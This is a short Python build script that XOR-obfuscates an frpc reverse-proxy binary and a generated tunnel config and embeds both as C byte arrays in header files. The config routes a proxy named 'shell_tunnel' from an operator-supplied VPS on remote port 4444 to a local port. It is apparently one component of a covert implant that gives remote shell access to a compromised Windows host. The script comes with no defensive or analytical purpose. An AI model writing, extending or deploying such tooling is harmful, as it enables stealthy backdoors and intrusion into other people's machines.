"""
Embed frpc.exe + config into C header files.
Usage: python embed_frp.py <frpc_path> <vps_ip> [vps_port=7000] [remote_port=4444]
"""
import sys, os

XOR_KEY = bytes([0xCE, 0x9A, 0x3F, 0x55, 0xB1, 0xE2, 0x78, 0x4D])

def xor(b):
    return bytes(b[i] ^ XOR_KEY[i % len(XOR_KEY)] for i in range(len(b)))

def to_c_array(name, data, cols=12):
    lines = [f"static unsigned char {name}[] = {{"]
    for i in range(0, len(data), cols):
        chunk = data[i:i+cols]
        lines.append("    " + ", ".join(f"0x{b:02X}" for b in chunk) + ",")
    lines.append("};")
    lines.append(f"static unsigned int {name}_len = {len(data)};")
    return "\n".join(lines)

def main():
    if len(sys.argv) < 3:
        print(__doc__)
        sys.exit(1)

    frpc_path = sys.argv[1]
    vps_ip = sys.argv[2]
    vps_port = int(sys.argv[3]) if len(sys.argv) > 3 else 7000
    remote_port = int(sys.argv[4]) if len(sys.argv) > 4 else 4444
    local_port = 54321

    if not os.path.exists(frpc_path):
        print(f"[-] frpc not found: {frpc_path}")
        sys.exit(1)

    # 1. Encrypt frpc binary
    with open(frpc_path, "rb") as f:
        frpc_data = f.read()
    frpc_enc = xor(frpc_data)
    frpc_h = to_c_array("g_frpc_enc", frpc_enc)

    # 2. Generate frpc.toml
    config = (
        f'serverAddr = "{vps_ip}"\n'
        f'serverPort = {vps_port}\n'
        '[[proxies]]\n'
        'name = "shell_tunnel"\n'
        'type = "tcp"\n'
        f'localIP = "127.0.0.1"\n'
        f'localPort = {local_port}\n'
        f'remotePort = {remote_port}\n'
    )
    config_enc = xor(config.encode())
    config_h = to_c_array("g_config_enc", config_enc)

    # 3. Write output files (atomic — write to .tmp then os.replace so a
    # crash mid-write doesn't leave a half-baked header that fails to
    # compile, leaving the project in a broken state.)
    outdir = os.path.dirname(os.path.abspath(__file__))
    def atomic_write(rel, body):
        final = os.path.join(outdir, "..", rel)
        tmp = final + ".tmp"
        with open(tmp, "w", encoding="utf-8") as f:
            f.write(body)
        os.replace(tmp, final)

    atomic_write("frpc_data.h",
        "// Auto-generated by embed_frp.py\n"
        f"// frpc: {os.path.basename(frpc_path)} ({len(frpc_data)} bytes)\n"
        f"// VPS: {vps_ip}:{vps_port}, remote port: {remote_port}\n\n"
        f"{frpc_h}\n\n")

    atomic_write("config_data.h",
        "// Auto-generated by embed_frp.py\n"
        f"// frpc.toml ({len(config)} bytes)\n\n"
        f"{config_h}\n\n")

    print(f"[+] frpc: {len(frpc_data)} bytes → frpc_data.h ({len(frpc_enc)} encrypted)")
    print(f"[+] config: {len(config)} bytes → config_data.h")
    print(f"[+] VPS: {vps_ip}:{vps_port}, tunnel: VPS:{remote_port} → localhost:{local_port}")

if __name__ == "__main__":
    main()
